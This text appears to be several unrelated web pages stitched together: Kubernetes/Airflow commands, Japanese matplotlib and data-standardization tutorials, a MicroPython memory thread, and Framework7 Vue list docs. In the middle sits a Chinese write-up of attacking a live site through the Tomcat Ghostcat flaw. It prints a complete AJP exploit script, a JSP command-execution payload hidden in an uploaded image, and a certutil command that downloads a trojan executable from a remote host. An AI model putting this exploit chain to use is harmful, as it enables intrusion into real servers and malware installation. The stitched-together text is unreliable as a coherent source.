NAME READY UP-TO-DATE AVAILABLE AGE
scheduler 1/1 1 1 123m
statsd 1/1 1 1 24h
webserver 1/1 1 1 122m
Check if all corresponding pods are healthy:
$ kubectl get po -n airflow-on-k8s
NAME READY STATUS RESTARTS AGE
scheduler-7584f4b4b7-5zhvw 2/2 Running 0 125m
statsd-d6d5bcd7c-dg26n 1/1 Running 0 24h
webserver-647fdcb7c-4qkx9 1/1 Running 0 124m
Check status/events of any particular pod (scheduler-7584f4b4b7-5zhvw pod in this example):
$ kubectl describe pod scheduler-7584f4b4b7-5zhvw -n airflow-on-k8s
Check pod logs (where -c parameter refers to the name of init-container we want to check on, scheduler in this case):
kubectl logs scheduler-7584f4b4b7-5zhvw -n airflow-on-k8s -c scheduler
Check logs from init-container of a pod (where -c parameter refers to the name of init-container we want to check on, run-airflow-migrations in this case):
$ kubectl logs scheduler-7584f4b4b7-5zhvw -n airflow-on-k8s -c run-airflow-migrations
Connect to a pod to execute commands from within (webserver-647fdcb7c-4qkx9 pod in this example):
kubectl exec --stdin --tty webserver-647fdcb7c-4qkx9 -n airflow-on-k8s -- /bin/bash
After getting connected, we can execute commands (for example check the dags directory):
airflow@webserver-647fdcb7c-4qkx9:/opt/airflow$ cd dags
airflow@webserver-647fdcb7c-4qkx9:/opt/airflow/dags$ ls
__pycache__ dag_processor_manager dags first-dag.py hello_dag.py hello_world.py outfile scheduler
Overview of resources created
We can see which resources are running in the cluster by running the following command:
kubectl get all -n airflow-on-k8s
NAME READY STATUS RESTARTS AGE
pod/scheduler-7584f4b4b7-jdfzl 2/2 Running 0 13m
pod/statsd-d6d5bcd7c-mjdm7 1/1 Running 0 17m
pod/webserver-647fdcb7c-ft72t 1/1 Running 0 8m26s
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
service/statsd ClusterIP 10.0.47.229 <none> 9125/UDP,9102/TCP 16m
service/webserver ClusterIP 10.0.197.80 <none> 8080/TCP 6s
NAME READY UP-TO-DATE AVAILABLE AGE
deployment.apps/scheduler 1/1 1 1 13m
deployment.apps/statsd 1/1 1 1 17m
deployment.apps/webserver 1/1 1 1 8m26s
NAME DESIRED CURRENT READY AGE
replicaset.apps/scheduler-7584f4b4b7 1 1 1 13m
replicaset.apps/statsd-d6d5bcd7c 1 1 1 17m
replicaset.apps/webserver-647fdcb7c 1 1 1 8m26s
Note: it doesn’t show the secrets, persistent volumes, persistent volume claims, service accounts, cluster roles, or cluster role bindings that we also created.
In Azure Portal, you can see all the resources within the main resource group:
Figure 11. Cloud Resources
To clean up your environment, just run:
az group delete --name $RESOURCE_GROUP_NAME
Next Steps
As a next step, experiment and take a look at some of the DAG definitions and integrations available!
About the Author
Lena Hall is a Director of Engineering at Microsoft working on Azure, where she focuses on large-scale distributed systems and modern architectures. She is leading a team and technical strategy for product improvement efforts across Big Data services at Microsoft. Lena is the driver behind engineering initiatives and strategies to advance, facilitate and push forward further acceleration of cloud services. Lena has 10 years of experience in solution architecture and software engineering with a focus on distributed cloud programming, real-time system design, highly scalable and performant systems, big data analysis, data science, functional programming, and machine learning. Previously, she was a Senior Software Engineer at Microsoft Research. She co-organizes a conference called ML4ALL, and is often an invited member of program committees for conferences like Kafka Summit, Lambda World, and others. Lena holds a master’s degree in computer science. Twitter: @lenadroid LinkedIn: Lena Hall
|
X軸名、Y軸名の表示
前回、subplotを使った際のタイトルの表示方法を解説しました。
今回はsubplots、subplotで複数のグラフを表示した際のX軸名、Y軸名の追加方法を解説していきます。
まずは基本となるプログラムの紹介です。
前回、タイトルを追加したのですが、ちょっと今回の解説には邪魔になるので、削除しています、
subplotsを使った場合の基本のプログラムはこちら。
from matplotlib import pyplot as plt
x = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
y1 = [2, 4, 6, 8, 10, 12, 14, 16, 18, 20]
y2 = [2, 4, 8, 16, 32, 64, 128, 256, 512, 1024]
y3 = [1, 3, 5, 7, 9, 11, 13, 15, 17, 19]
y4 = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29]
fig = plt.figure()
axes= fig.subplots(2)
axes[0].plot(x, y1)
axes[0].plot(x, y2)
axes[1].plot(x, y3)
axes[1].plot(x, y4)
plt.subplots_adjust(hspace=0.5)
plt.show()
実行結果
こちらはsubplotの場合の基本プログラムです。
from matplotlib import pyplot as plt
x = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
y1 = [2, 4, 6, 8, 10, 12, 14, 16, 18, 20]
y2 = [2, 4, 8, 16, 32, 64, 128, 256, 512, 1024]
y3 = [1, 3, 5, 7, 9, 11, 13, 15, 17, 19]
y4 = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29]
fig = plt.figure()
plt.subplot(2,1,1)
plt.plot(x, y1)
plt.plot(x, y2)
plt.subplot(2,1,2)
plt.plot(x, y3)
plt.plot(x, y4)
plt.subplots_adjust(hspace=0.5)
plt.show()
実行結果
subplots_adjustでそれぞれのグラフの隙間を少し開けて、軸名を追加した際に被らないようにしています。
subplotsを使った場合の軸名の表示
subplotsを使った場合、X軸名を表示するには「set_xlabel(“X軸名”)」、Y軸名を表示するには「set_ylabel(“Y軸名”)」を追加します。
from matplotlib import pyplot as plt
x = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
y1 = [2, 4, 6, 8, 10, 12, 14, 16, 18, 20]
y2 = [2, 4, 8, 16, 32, 64, 128, 256, 512, 1024]
y3 = [1, 3, 5, 7, 9, 11, 13, 15, 17, 19]
y4 = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29]
fig = plt.figure()
axes= fig.subplots(2)
axes[0].plot(x, y1)
axes[0].plot(x, y2)
axes[1].plot(x, y3)
axes[1].plot(x, y4)
axes[0].set_xlabel("X1")
axes[1].set_xlabel("X2")
axes[0].set_ylabel("Y1")
axes[1].set_ylabel("Y2")
plt.subplots_adjust(hspace=0.5)
plt.show()
実行結果
それぞれのグラフにX軸名、Y軸名を追加できました。
subplotを使った場合の軸名の表示
次にsubplotを使った場合のX軸名、Y軸名の表示の方法を見てみましょう。
X軸名を追加するには「xlabel(“X軸名”)」、Y軸名を追加するには「ylabel(“Y軸名”)」でできますが、タイトルを追加した時同様、追加する場所が重要です。
from matplotlib import pyplot as plt
x = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
y1 = [2, 4, 6, 8, 10, 12, 14, 16, 18, 20]
y2 = [2, 4, 8, 16, 32, 64, 128, 256, 512, 1024]
y3 = [1, 3, 5, 7, 9, 11, 13, 15, 17, 19]
y4 = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29]
fig = plt.figure()
plt.subplot(2,1,1)
plt.plot(x, y1)
plt.plot(x, y2)
plt.xlabel("X1")
plt.ylabel("Y1")
plt.subplot(2,1,2)
plt.plot(x, y3)
plt.plot(x, y4)
plt.xlabel("X2")
plt.ylabel("Y2")
plt.subplots_adjust(hspace=0.5)
plt.show()
実行結果
全てのグラフ共通のX軸名、Y軸名を表示する方法
ここまで表示しているそれぞれのグラフにX軸名、Y軸名を追加する方法を解説してきました。
しかしここで一つ疑問なのが、全てのグラフに共通のX軸名、Y軸名を追加できないかということ。
もし共通の軸名を表示できれば、グラフ全体がすっきりする場合もあるでしょう。
ということでその方法を紹介しますが、また細かい解説に関しては別の機会を設けますので、暫しお待ちください。
X軸で共通の軸名を追加するには、とりあえずこのコマンドで可能です。
fig.text(0.5, 0, 'x common label', ha='center', va='center', fontsize=20)
Y軸の場合はこんな感じです。
fig.text(0, 0.5, 'y comonn label', ha='center', va='center', rotation='vertical', fontsize=20)
このコマンドはsubplotsでもsubplotでも使うことができます。
それぞれ試してみましょう。
subplotsの場合はこんな感じ。
from matplotlib import pyplot as plt
x = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
y1 = [2, 4, 6, 8, 10, 12, 14, 16, 18, 20]
y2 = [2, 4, 8, 16, 32, 64, 128, 256, 512, 1024]
y3 = [1, 3, 5, 7, 9, 11, 13, 15, 17, 19]
y4 = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29]
fig = plt.figure()
axes= fig.subplots(2)
axes[0].plot(x, y1)
axes[0].plot(x, y2)
axes[1].plot(x, y3)
axes[1].plot(x, y4)
plt.subplots_adjust(hspace=0.5)
fig.text(0.5, 0, 'x common label', ha='center', va='center', fontsize=20)
fig.text(0, 0.5, 'y comonn label', ha='center', va='center', rotation='vertical', fontsize=20)
plt.show()
実行結果
subplotの場合はこんな感じです。
from matplotlib import pyplot as plt
x = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
y1 = [2, 4, 6, 8, 10, 12, 14, 16, 18, 20]
y2 = [2, 4, 8, 16, 32, 64, 128, 256, 512, 1024]
y3 = [1, 3, 5, 7, 9, 11, 13, 15, 17, 19]
y4 = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29]
fig = plt.figure()
plt.subplot(2,1,1)
plt.plot(x, y1)
plt.plot(x, y2)
plt.subplot(2,1,2)
plt.plot(x, y3)
plt.plot(x, y4)
plt.subplots_adjust(hspace=0.5)
fig.text(0.5, 0, 'x common label', ha='center', va='center', fontsize=20)
fig.text(0, 0.5, 'y comonn label', ha='center', va='center', rotation='vertical', fontsize=20)
plt.show()
実行結果
これでsubplots、subplotのどちらでも共通の軸名を表示することができました。
ここ数回で複数のグラフを表示するsubplots、subplotの使い方を解説してきて、グラフの作成方法、表示範囲の指定方法、タイトルの表示方法、軸名の表示方法を解説しました。
となるとまだ解説していないのが、凡例の表示方法ですので、次回は凡例の表示方法を解説したいと思います。
ということで今回はこんな感じで。
|
Thanks. Please state the firmware version.bmarkus wrote:On a LoPy v1.0 board with stock firmware
Code: Select all
>>> import gc
>>> gc.collect()
>>> gc.mem_free()
191088
>>>
kfricke wrote:The LoPy firmware does only print a commit hash suffix but no MicroPython release number. So only Pycom knows which MicroPython release we do use there.
Code: Select all
import os
os.uname()
Tiny Core Linux (piCore) developer
HAM radio call: HA5DI (Béla)
HAM radio call: HA5DI (Béla)
Code: Select all
>>> import os
>>> os.uname()
(sysname='LoPy', nodename='LoPy', release='0.9.0.b2', version='f5444c7 on 2016-10-12', machine='LoPy with ESP32')
Code: Select all
>>> import gc
>>> gc.collect()
>>> gc.mem_free()
191216
Yes Frida is my watchdog!
Updated LoPy to 0.9.1.b1 firmware released today. Now free RAM is only
71152 bytesAlso, every execution of gc.mem_free() is decresing it by 64 bytes
Tiny Core Linux (piCore) developer
HAM radio call: HA5DI (Béla)
HAM radio call: HA5DI (Béla)
Answer from here :bmarkus wrote:Updated LoPy to 0.9.1.b1 firmware released today. Now free RAM is only71152 bytesAlso, every execution of gc.mem_free() is decresing it by 64 bytes
So the free RAM on LoPy (and possibly WiPy 2.0) is a moving target. Hoping to see about 150 KB of free RAM.71,152 is the expected value for now. We will increase it in future releases, and we should end-up with something around 150K. The old value of 191,088 was wrong and that was causing the gc crashes.
Calling gc.mem_free() on the REPL will decrease the value as it creates new objects. As soon as you call gc.collect() the free memory amount will increase again.
Cheers,
Daniel
Added firmware/MicroPython versions for most of the boards in 1st post. I'll later update Pyboard line with the MicroPython version.
Last edited by rcolistete on Wed Nov 02, 2016 8:22 pm, edited 1 time in total.
Teensy 3.6:
Code: Select all
>>> __import__('gc').mem_free()
233920
Code: Select all
>>> del machine
>>> del pins
>>> del pyb
>>> del led
>>> del af
>>> __import__('gc').collect()
>>> __import__('gc').mem_free()
234496
Thanks. Hope to see it in v1.8.6. Constrained RAM is one of the limitations of ESP8266, so this increase will be very useful.Roberthh wrote:Today's commit for ESP8266 increased the heap and this the available RAM by 8k.
1st post updated with free RAM for LoPy and WiPy2, firmware v0.9.3.b2 with 77KB, 8KB more than previous version.
|
Pythonでデータを標準化するとき、Numpy、Pandas、sklearnのデフォルト値が違くて、混乱しました。備忘録として、まとめます。
標準化とは?
標準化とは正規化の1つであり、平均を0、分散を1にして、データのばらつきを統一する方法です。
Numpy・Pandas・sklearnでの標準化
標準化をするとき、標準偏差、不偏標準偏差どちらを使うかどうかで、値が変わります。
Numpy・Pandas・sklearnでは、標準偏差を求める際、デフォルトが異なります。
標準偏差:Numpy・sklearn
不偏標準偏差:Pandas
標準偏差 不偏標準偏差
Numpy np.std(data) np.std(data, ddof=1)
Pandas df.std(ddof=0) df.std()
sklearn デフォルト
サンプルコード
100コのランダムな値を使って、確かめてみました。
import numpy as np
import pandas as pd
# データ準備
np.random.seed(0)
# numpy用
samples = np.random.rand(100)
# pandas用
df = pd.DataFrame(data=samples,columns=['samples'])
# numpyでの標準化
samples_scaler_np = (samples - samples.mean()) / np.std(samples)
# pandasでの標準化
samples_scaler_pd = (df - df.mean()) / df.std()
print('numpy',samples_scaler_np.mean(),np.std(samples_scaler_np))
print('pandas',samples_scaler_pd.mean(),samples_scaler_pd.std())
numpy -1.2212453270876723e-16 1.0
pandas -1.110223e-16 1.0
numpyは標準偏差、pandasは不偏標準偏差を使って標準化したので、平均が少し異なることを確認できました!
続いて、sklearnで標準化してみます。
from sklearn.preprocessing import StandardScaler
# インスタンス化
scaler = StandardScaler()
scaler.fit(df)
# 標準化
df_samples_scaler = scaler.transform(df)
df_samples_scaler.mean(),df_samples_scaler.std()
(-1.2212453270876723e-16, 1.0)
Numpyと同じように標準偏差で標準化したので、ちゃんと同じ値になっています。
最後に、pandasを使って、標準偏差で標準化してみましょう。
samples_scaler_pd = (df - df.mean()) / df.std(ddof=0)
print('pandas',samples_scaler_pd.mean())
pandas -1.221245e-16
今度はNumpyとPandasと同じ値になりました!
もしnumpy、pandas、sklearnで標準化後の値が違う時は、標準偏差、不偏標準偏差どちらを使っているか、確認すると良いでしょう。
|
前言: 公司项目上遇到的一个传销站,是一个Thinkphp3.0的。尝试了payload进行注入后,发现只有一个盲注。
于是就去找找有没有相同站点,拿个源码来审计审计。
搜索到一个相同站点下存在8009端口的ajp协议和一个8080端口的tomcat站点,于是就想到了幽灵猫漏洞。
发现使用Jspstudy搭建的。
于是用了EXP检测了下,发现可以读取到文件。 EXP地址: https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi/
有了任意文件读取,我发现实质性也干不了什么,不知道具体文件名称。
尝试读了几个后台登陆验证文件,也没发现有什么用。
百度了下幽灵猫漏洞的利用,基本上是到了任意文件读取就结束了。。。服了。。
主要是靠这两篇文章来解决: https://www.cnblogs.com/glowing-z/p/12345961.html
首先必备条件是,tomcat的网站有上传点。
上传一个图片,内容为
<%out.println(new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec("whoami").getInputStream())).readLine());%>
可以把whoami改成
certutil -urlcache -split -f http://xxx.xx.xxx.xx/1.exe
来下载木马,然后直接输入程序名,既可以上线。
然后利用POC
#!/usr/bin/env python
# CNVD-2020-10487 Tomcat-Ajp lfi
# by ydhcui
import struct
import io
import base64
# Some references:
# https://tomcat.apache.org/connectors-doc/ajp/ajpv13a.html
def pack_string(s):
if s is None:
return struct.pack(">h", -1)
l = len(s)
return struct.pack(">H%dsb" % l, l, s.encode('utf8'), 0)
def unpack(stream, fmt):
size = struct.calcsize(fmt)
buf = stream.read(size)
return struct.unpack(fmt, buf)
def unpack_string(stream):
size, = unpack(stream, ">h")
if size == -1: # null string
return None
res, = unpack(stream, "%ds" % size)
stream.read(1) # \0
return res
class NotFoundException(Exception):
pass
class AjpBodyRequest(object):
# server == web server, container == servlet
SERVER_TO_CONTAINER, CONTAINER_TO_SERVER = range(2)
MAX_REQUEST_LENGTH = 8186
def __init__(self, data_stream, data_len, data_direction=None):
self.data_stream = data_stream
self.data_len = data_len
self.data_direction = data_direction
def serialize(self):
data = self.data_stream.read(AjpBodyRequest.MAX_REQUEST_LENGTH)
if len(data) == 0:
return struct.pack(">bbH", 0x12, 0x34, 0x00)
else:
res = struct.pack(">H", len(data))
res += data
if self.data_direction == AjpBodyRequest.SERVER_TO_CONTAINER:
header = struct.pack(">bbH", 0x12, 0x34, len(res))
else:
header = struct.pack(">bbH", 0x41, 0x42, len(res))
return header + res
def send_and_receive(self, socket, stream):
while True:
data = self.serialize()
socket.send(data)
r = AjpResponse.receive(stream)
while r.prefix_code != AjpResponse.GET_BODY_CHUNK and r.prefix_code != AjpResponse.SEND_HEADERS:
r = AjpResponse.receive(stream)
if r.prefix_code == AjpResponse.SEND_HEADERS or len(data) == 4:
break
class AjpForwardRequest(object):
_, OPTIONS, GET, HEAD, POST, PUT, DELETE, TRACE, PROPFIND, PROPPATCH, MKCOL, COPY, MOVE, LOCK, UNLOCK, ACL, REPORT, VERSION_CONTROL, CHECKIN, CHECKOUT, UNCHECKOUT, SEARCH, MKWORKSPACE, UPDATE, LABEL, MERGE, BASELINE_CONTROL, MKACTIVITY = range(
28)
REQUEST_METHODS = {'GET': GET, 'POST': POST, 'HEAD': HEAD, 'OPTIONS': OPTIONS, 'PUT': PUT, 'DELETE': DELETE,
'TRACE': TRACE}
# server == web server, container == servlet
SERVER_TO_CONTAINER, CONTAINER_TO_SERVER = range(2)
COMMON_HEADERS = ["SC_REQ_ACCEPT",
"SC_REQ_ACCEPT_CHARSET", "SC_REQ_ACCEPT_ENCODING", "SC_REQ_ACCEPT_LANGUAGE",
"SC_REQ_AUTHORIZATION",
"SC_REQ_CONNECTION", "SC_REQ_CONTENT_TYPE", "SC_REQ_CONTENT_LENGTH", "SC_REQ_COOKIE",
"SC_REQ_COOKIE2",
"SC_REQ_HOST", "SC_REQ_PRAGMA", "SC_REQ_REFERER", "SC_REQ_USER_AGENT"
]
ATTRIBUTES = ["context", "servlet_path", "remote_user", "auth_type", "query_string", "route", "ssl_cert",
"ssl_cipher", "ssl_session", "req_attribute", "ssl_key_size", "secret", "stored_method"]
def __init__(self, data_direction=None):
self.prefix_code = 0x02
self.method = None
self.protocol = None
self.req_uri = None
self.remote_addr = None
self.remote_host = None
self.server_name = None
self.server_port = None
self.is_ssl = None
self.num_headers = None
self.request_headers = None
self.attributes = None
self.data_direction = data_direction
def pack_headers(self):
self.num_headers = len(self.request_headers)
res = ""
res = struct.pack(">h", self.num_headers)
for h_name in self.request_headers:
if h_name.startswith("SC_REQ"):
code = AjpForwardRequest.COMMON_HEADERS.index(h_name) + 1
res += struct.pack("BB", 0xA0, code)
else:
res += pack_string(h_name)
res += pack_string(self.request_headers[h_name])
return res
def pack_attributes(self):
res = b""
for attr in self.attributes:
a_name = attr['name']
code = AjpForwardRequest.ATTRIBUTES.index(a_name) + 1
res += struct.pack("b", code)
if a_name == "req_attribute":
aa_name, a_value = attr['value']
res += pack_string(aa_name)
res += pack_string(a_value)
else:
res += pack_string(attr['value'])
res += struct.pack("B", 0xFF)
return res
def serialize(self):
res = ""
res = struct.pack("bb", self.prefix_code, self.method)
res += pack_string(self.protocol)
res += pack_string(self.req_uri)
res += pack_string(self.remote_addr)
res += pack_string(self.remote_host)
res += pack_string(self.server_name)
res += struct.pack(">h", self.server_port)
res += struct.pack("?", self.is_ssl)
res += self.pack_headers()
res += self.pack_attributes()
if self.data_direction == AjpForwardRequest.SERVER_TO_CONTAINER:
header = struct.pack(">bbh", 0x12, 0x34, len(res))
else:
header = struct.pack(">bbh", 0x41, 0x42, len(res))
return header + res
def parse(self, raw_packet):
stream = io.StringIO(raw_packet)
self.magic1, self.magic2, data_len = unpack(stream, "bbH")
self.prefix_code, self.method = unpack(stream, "bb")
self.protocol = unpack_string(stream)
self.req_uri = unpack_string(stream)
self.remote_addr = unpack_string(stream)
self.remote_host = unpack_string(stream)
self.server_name = unpack_string(stream)
self.server_port = unpack(stream, ">h")
self.is_ssl = unpack(stream, "?")
self.num_headers, = unpack(stream, ">H")
self.request_headers = {}
for i in range(self.num_headers):
code, = unpack(stream, ">H")
if code > 0xA000:
h_name = AjpForwardRequest.COMMON_HEADERS[code - 0xA001]
else:
h_name = unpack(stream, "%ds" % code)
stream.read(1) # \0
h_value = unpack_string(stream)
self.request_headers[h_name] = h_value
def send_and_receive(self, socket, stream, save_cookies=False):
res = []
i = socket.sendall(self.serialize())
if self.method == AjpForwardRequest.POST:
return res
r = AjpResponse.receive(stream)
assert r.prefix_code == AjpResponse.SEND_HEADERS
res.append(r)
if save_cookies and 'Set-Cookie' in r.response_headers:
self.headers['SC_REQ_COOKIE'] = r.response_headers['Set-Cookie']
# read body chunks and end response packets
while True:
r = AjpResponse.receive(stream)
res.append(r)
if r.prefix_code == AjpResponse.END_RESPONSE:
break
elif r.prefix_code == AjpResponse.SEND_BODY_CHUNK:
continue
else:
raise NotImplementedError
break
return res
class AjpResponse(object):
_, _, _, SEND_BODY_CHUNK, SEND_HEADERS, END_RESPONSE, GET_BODY_CHUNK = range(7)
COMMON_SEND_HEADERS = [
"Content-Type", "Content-Language", "Content-Length", "Date", "Last-Modified",
"Location", "Set-Cookie", "Set-Cookie2", "Servlet-Engine", "Status", "WWW-Authenticate"
]
def parse(self, stream):
# read headers
self.magic, self.data_length, self.prefix_code = unpack(stream, ">HHb")
if self.prefix_code == AjpResponse.SEND_HEADERS:
self.parse_send_headers(stream)
elif self.prefix_code == AjpResponse.SEND_BODY_CHUNK:
self.parse_send_body_chunk(stream)
elif self.prefix_code == AjpResponse.END_RESPONSE:
self.parse_end_response(stream)
elif self.prefix_code == AjpResponse.GET_BODY_CHUNK:
self.parse_get_body_chunk(stream)
else:
raise NotImplementedError
def parse_send_headers(self, stream):
self.http_status_code, = unpack(stream, ">H")
self.http_status_msg = unpack_string(stream)
self.num_headers, = unpack(stream, ">H")
self.response_headers = {}
for i in range(self.num_headers):
code, = unpack(stream, ">H")
if code <= 0xA000: # custom header
h_name, = unpack(stream, "%ds" % code)
stream.read(1) # \0
h_value = unpack_string(stream)
else:
h_name = AjpResponse.COMMON_SEND_HEADERS[code - 0xA001]
h_value = unpack_string(stream)
self.response_headers[h_name] = h_value
def parse_send_body_chunk(self, stream):
self.data_length, = unpack(stream, ">H")
self.data = stream.read(self.data_length + 1)
def parse_end_response(self, stream):
self.reuse, = unpack(stream, "b")
def parse_get_body_chunk(self, stream):
rlen, = unpack(stream, ">H")
return rlen
@staticmethod
def receive(stream):
r = AjpResponse()
r.parse(stream)
return r
import socket
def prepare_ajp_forward_request(target_host, req_uri, method=AjpForwardRequest.GET):
fr = AjpForwardRequest(AjpForwardRequest.SERVER_TO_CONTAINER)
fr.method = method
fr.protocol = "HTTP/1.1"
fr.req_uri = req_uri
fr.remote_addr = target_host
fr.remote_host = None
fr.server_name = target_host
fr.server_port = 80
fr.request_headers = {
'SC_REQ_ACCEPT': 'text/html',
'SC_REQ_CONNECTION': 'keep-alive',
'SC_REQ_CONTENT_LENGTH': '0',
'SC_REQ_HOST': target_host,
'SC_REQ_USER_AGENT': 'Mozilla',
'Accept-Encoding': 'gzip, deflate, sdch',
'Accept-Language': 'en-US,en;q=0.5',
'Upgrade-Insecure-Requests': '1',
'Cache-Control': 'max-age=0'
}
fr.is_ssl = False
fr.attributes = []
return fr
class Tomcat(object):
def __init__(self, target_host, target_port):
self.target_host = target_host
self.target_port = target_port
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.connect((target_host, target_port))
self.stream = self.socket.makefile("rb", buffering=0)
def perform_request(self, req_uri, headers={}, method='GET', user=None, password=None, attributes=[]):
self.req_uri = req_uri
self.forward_request = prepare_ajp_forward_request(self.target_host, self.req_uri,
method=AjpForwardRequest.REQUEST_METHODS.get(method))
print("Getting resource at ajp13://%s:%d%s" % (self.target_host, self.target_port, req_uri))
if user is not None and password is not None:
self.forward_request.request_headers[
'SC_REQ_AUTHORIZATION'] = f'Basic {base64.b64encode(f"{user}:{password}".encode()).decode()}'
for h in headers:
self.forward_request.request_headers[h] = headers[h]
for a in attributes:
self.forward_request.attributes.append(a)
responses = self.forward_request.send_and_receive(self.socket, self.stream)
if len(responses) == 0:
return None, None
snd_hdrs_res = responses[0]
data_res = responses[1:-1]
if len(data_res) == 0:
print("No data in response. Headers:%s\n" % snd_hdrs_res.response_headers)
return snd_hdrs_res, data_res
'''
javax.servlet.include.request_uri
javax.servlet.include.path_info
javax.servlet.include.servlet_path
'''
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("target", type=str, help="Hostname or IP to attack")
parser.add_argument('-p', '--port', type=int, default=8009, help="AJP port to attack (default is 8009)")
parser.add_argument("-f", '--file', type=str, default='WEB-INF/web.xml', help="file path :(WEB-INF/web.xml)")
parser.add_argument('--rce', type=bool, default=False, help="read file(default) or exec command")
args = parser.parse_args()
t = Tomcat(args.target, args.port)
_, data = t.perform_request(f'/hissec{".jsp" if args.rce else ""}', attributes=[
{'name': 'req_attribute', 'value': ['javax.servlet.include.request_uri', '/']},
{'name': 'req_attribute', 'value': ['javax.servlet.include.path_info', args.file]},
{'name': 'req_attribute', 'value': ['javax.servlet.include.servlet_path', '/']},
])
print('----------------------------')
print(''.join([d.data.decode('utf_8') for d in data]))
使用方式:
python3 2020-10487.py -p 8009 IP -f /pic/202004281702140.jpg --rce 1
至此,结束,拖源码居然发现是什么xs_run的加密。
|
List Vue Component
List views are versatile and powerful user interface compontents frequently found in iOS apps. A list view presents data in a scrollable list of multiple rows that may be divided into sections/groups.
List views have many purposes:
To let users navigate through hierarchically structured data
To present an indexed list of items
To display detail information and controls in visually distinct groupings
To present a selectable list of options
List Vue component represents Framework7's List View component.
List Components
There are following components included:
- main List View elementf7-list
- list group elementf7-list-group
List Properties
Prop Type Default Description
<f7-list> properties
inset boolean false Makes list block inset
tablet-inset boolean false Makes block inset on tablets, but not on phones
media-list boolean false Enables Media List
links-list boolean false Enables simplified Links List
simple-list boolean false Enables simplified Simple List
sortable boolean false Enables Sortable List
sortable-enabled boolean false Enables sorting on sortable list
sortable-move-elements boolean When passed it will overwrite same `sortable.moveElements` global app parameter.
accordion boolean false Enables Accordion List
contacts-list boolean false Enables Contacts List by adding required addional classes for styling
form boolean false Enables <form> tag on list block instead of <div>
form-store-data boolean false Enables form storage for the current form
inline-labels boolean false Enables inline-styled labels for Form Inputs
no-chevron boolean false Removes "chevron" icon on nested list item links
chevron-center boolean false Sets "chevron" icon on nested media list items on center (vertically)
no-hairlines boolean false Removes outer hairlines
no-hairlines-md boolean false Removes outer hairlines for MD theme
no-hairlines-ios boolean false Removes outer hairlines for iOS theme
no-hairlines-between boolean false Removes inner hairlines between items
no-hairlines-between-md boolean false Removes inner hairlines between items for MD theme
no-hairlines-between-ios boolean false Removes inner hairlines between items for iOS theme
tab boolean false Adds additional "tab" class when block should be used as a Tab
tab-active boolean false Adds additional "tab-active" class when block used as a Tab and makes it active tab
virtual-list boolean false Enables Virtual List
virtual-list-params object Object with Virtual List Parameters
<f7-list-group> properties
media-list boolean false Enables Media List for this group
sortable boolean false Enables Sortable List for this group
simple-list boolean false Enables simplified Simple List for this group
List Events
Event Description
<f7-list> events
tab:show Event will be triggered when List Block-Tab becomes visible/active
tab:hide Event will be triggered when List Block-Tab becomes invisible/inactive
submit Event will be triggered on list-form submit when list used as form (with enabled form prop)
<f7-list> Sortable specific events
sortable:enable Event will be triggered when sortable mode is enabled
sortable:disable Event will be triggered when sortable mode is disabled
sortable:sort Event will be triggered after user release currently sorting element in new position. event.detail will contain object with from and to properties with start/new index numbers of sorted list item
<f7-list> Virtual List specific events
virtual:itembeforeinsert Event will be triggered before item will be added to virtual document fragment
virtual:itemsbeforeinsert Event will be triggered after current DOM list will be removed and before new document will be inserted
virtual:itemsafterinsert Event will be triggered after new document fragment with items inserted
virtual:beforeclear Event will be triggered before current DOM list will be removed and replaced with new document fragment
List Slots
List Vue component (<f7-list>) has additional slots for custom elements:
- element will be inserted in the beginning of list view and right beforebefore-list<ul>main list
- element will be inserted in the end of list view and right afterafter-list<ul>main list
- element will be inserted inside oflist<ul>main list element
Virtual List
For Virtual List usage and examples check the Virtual List Vue Component documentation.
Sortable List
For Sortable List usage and examples check the Sortable Vue Component documentation.
Accordion List
For Accordion List usage and examples check the Accordion Vue Component documentation.
Examples
Simple List
<f7-block-title>Simple List</f7-block-title>
<f7-list simple-list>
<f7-list-item title="Item 1"></f7-list-item>
<f7-list-item title="Item 2"></f7-list-item>
<f7-list-item title="Item 3"></f7-list-item>
</f7-list>
Simple List Links
<f7-block-title>Simple Links List</f7-block-title>
<f7-list>
<f7-list-item title="Link 1" link="#"></f7-list-item>
<f7-list-item title="Link 2" link="#"></f7-list-item>
<f7-list-item title="Link 3" link="#"></f7-list-item>
</f7-list>
Data list, with icons
<f7-block-title>Data list, with icons</f7-block-title>
<f7-list>
<f7-list-item title="Ivan Petrov" after="CEO">
<f7-icon slot="media" icon="demo-list-icon"></f7-icon>
</f7-list-item>
<f7-list-item title="John Doe" badge="5">
<f7-icon slot="media" icon="demo-list-icon"></f7-icon>
</f7-list-item>
<f7-list-item title="Jenna Smith">
<f7-icon slot="media" icon="demo-list-icon"></f7-icon>
</f7-list-item>
</f7-list>
Links
<f7-block-title>Links</f7-block-title>
<f7-list>
<f7-list-item link="#" title="Ivan Petrov" after="CEO">
<f7-icon slot="media" icon="demo-list-icon"></f7-icon>
</f7-list-item>
<f7-list-item link="#" title="John Doe" after="Cleaner">
<f7-icon slot="media" icon="demo-list-icon"></f7-icon>
</f7-list-item>
<f7-list-item link="#" title="Jenna Smith">
<f7-icon slot="media" icon="demo-list-icon"></f7-icon>
</f7-list-item>
</f7-list>
Links, Header, Footer
<f7-block-title>Links, Header, Footer</f7-block-title>
<f7-list>
<f7-list-item link="#" header="Name" title="John Doe" after="Edit">
<f7-icon slot="media" icon="demo-list-icon"></f7-icon>
</f7-list-item>
<f7-list-item link="#" header="Phone" title="+7 90 111-22-3344" after="Edit">
<f7-icon slot="media" icon="demo-list-icon"></f7-icon>
</f7-list-item>
